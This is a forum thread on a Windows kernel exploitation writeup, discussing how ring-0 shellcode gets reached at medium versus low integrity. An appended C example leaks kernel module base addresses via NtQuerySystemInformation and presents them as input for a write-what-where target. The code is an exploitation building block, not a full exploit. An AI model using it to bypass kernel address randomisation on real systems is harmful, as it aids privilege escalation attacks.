Nice writeup!
> with the write-what-where primitive in hand, executing ring-0 shellcode should be just a formality
Really, at low integrity? Should require an "0day" GDI infoleak or similar, no?
Thanks, and good question. I mostly meant it as "formality at Medium", but I guess even at low integrity you could leak the addresses of IDT/GDT and attack them, depending on how Windows was running (VM / bare metal etc.).
Not to mention there are many "0-day" kernel address leaks from the pools that Microsoft fixes only in the next version of Windows, like https://bugs.chromium.org/p/project-zero/issues/detail?id=1456 or some similar bugs.
But in the end I agree it's mostly a formality with access to SystemModuleInformation, other scenarios are certainly trickier ;)
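Added example (not part of the thread or the writeup it discusses): the "formality at Medium" step is NtQuerySystemInformation(SystemModuleInformation), which hands a Medium-IL process the kernel-mode ImageBase of every loaded driver, ntoskrnl.exe included. From Windows 8.1 on, the same call fails with STATUS_ACCESS_DENIED for Low-IL callers, which is why the low-integrity case in the thread needs a separate leak. The C below does the live query only under `#ifdef _WIN32`; elsewhere it parses a constructed sample buffer (the module names, bases and sizes are made up for illustration). The struct layout is the public RTL_PROCESS_MODULES / RTL_PROCESS_MODULE_INFORMATION one and assumes 64-bit Windows; the bounds checks are the part an exploit writer tends to skip and then regret when the buffer is short.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* SystemModuleInformation (class 11) response layout, 64-bit Windows. */
typedef struct {
    void    *Section;
    void    *MappedBase;
    void    *ImageBase;          /* kernel-mode base, the value we want */
    uint32_t ImageSize;
    uint32_t Flags;
    uint16_t LoadOrderIndex;
    uint16_t InitOrderIndex;
    uint16_t LoadCount;
    uint16_t OffsetToFileName;   /* offset of the file name inside FullPathName */
    uint8_t  FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION;

typedef struct {
    uint32_t NumberOfModules;    /* Modules[] starts at offset 8 (4 bytes padding) */
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES;

/* Case-insensitive compare of a NUL-terminated name that must end within max bytes. */
static int name_eq_ci(const char *a, const char *b, size_t max)
{
    for (size_t i = 0; i < max; i++) {
        unsigned char ca = (unsigned char)a[i], cb = (unsigned char)b[i];
        if (tolower(ca) != tolower(cb)) return 0;
        if (ca == 0) return 1;
    }
    return 0;                    /* no terminator inside the field: reject */
}

/* Return the ImageBase of the module named `name`, or 0 if absent or if the
   buffer is too short for the module count it claims. */
uint64_t module_base(const uint8_t *buf, size_t len, const char *name)
{
    if (len < sizeof(uint32_t)) return 0;
    const RTL_PROCESS_MODULES *mods = (const RTL_PROCESS_MODULES *)buf;
    uint32_t n = mods->NumberOfModules;
    size_t need = offsetof(RTL_PROCESS_MODULES, Modules) +
                  (size_t)n * sizeof(RTL_PROCESS_MODULE_INFORMATION);
    if (need > len) return 0;
    for (uint32_t i = 0; i < n; i++) {
        const RTL_PROCESS_MODULE_INFORMATION *m = &mods->Modules[i];
        uint16_t off = m->OffsetToFileName;
        if (off >= sizeof m->FullPathName) continue;
        const char *file = (const char *)m->FullPathName + off;
        if (name_eq_ci(file, name, sizeof m->FullPathName - off))
            return (uint64_t)(uintptr_t)m->ImageBase;
    }
    return 0;
}

/* Constructed sample (values invented for the example, not real addresses). */
typedef struct { uint32_t NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[2]; } SAMPLE_MODULES;
static SAMPLE_MODULES g_sample;

static void set_module(RTL_PROCESS_MODULE_INFORMATION *m, uint64_t base, uint32_t size, const char *path)
{
    memset(m, 0, sizeof *m);
    m->ImageBase = (void *)(uintptr_t)base;
    m->ImageSize = size;
    strncpy((char *)m->FullPathName, path, sizeof m->FullPathName - 1);
    const char *slash = strrchr(path, '\\');
    m->OffsetToFileName = (uint16_t)(slash ? (slash - path) + 1 : 0);
}

const uint8_t *build_sample(size_t *len)
{
    g_sample.NumberOfModules = 2;
    set_module(&g_sample.Modules[0], 0xFFFFF80312A00000ULL, 0x10A1000, "\\SystemRoot\\system32\\ntoskrnl.exe");
    set_module(&g_sample.Modules[1], 0xFFFFF97FFF000000ULL, 0x3D7000, "\\SystemRoot\\System32\\win32k.sys");
    *len = sizeof g_sample;
    return (const uint8_t *)&g_sample;
}

#ifdef _WIN32
#include <windows.h>
typedef LONG (WINAPI *NtQuerySystemInformation_t)(ULONG, PVOID, ULONG, PULONG);
#define SystemModuleInformation 11
#define STATUS_INFO_LENGTH_MISMATCH ((LONG)0xC0000004L)
/* Live query; returns NULL on any other status (STATUS_ACCESS_DENIED at Low IL). */
static uint8_t *query_live(size_t *len)
{
    NtQuerySystemInformation_t q = (NtQuerySystemInformation_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
    ULONG need = 0x10000;
    for (;;) {
        uint8_t *buf = malloc(need);
        if (!buf) return NULL;
        ULONG got = 0;
        LONG st = q(SystemModuleInformation, buf, need, &got);
        if (st == 0) { *len = got; return buf; }
        free(buf);
        if (st != STATUS_INFO_LENGTH_MISMATCH) return NULL;
        need = got ? got : need * 2;
    }
}
#endif

int main(void)
{
    size_t len;
#ifdef _WIN32
    const uint8_t *buf = query_live(&len);
    if (!buf) { puts("SystemModuleInformation unavailable (Low IL?)"); return 1; }
#else
    const uint8_t *buf = build_sample(&len);
#endif
    printf("ntoskrnl.exe @ 0x%llx\n", (unsigned long long)module_base(buf, len, "ntoskrnl.exe"));
    printf("win32k.sys   @ 0x%llx\n", (unsigned long long)module_base(buf, len, "win32k.sys"));
    return 0;
}
```

Once the base is known, any offset taken from the matching ntoskrnl build resolves to an absolute kernel address for the write-what-where target; a zero return means the leak is not available and the low-integrity path in the thread is the one to look at.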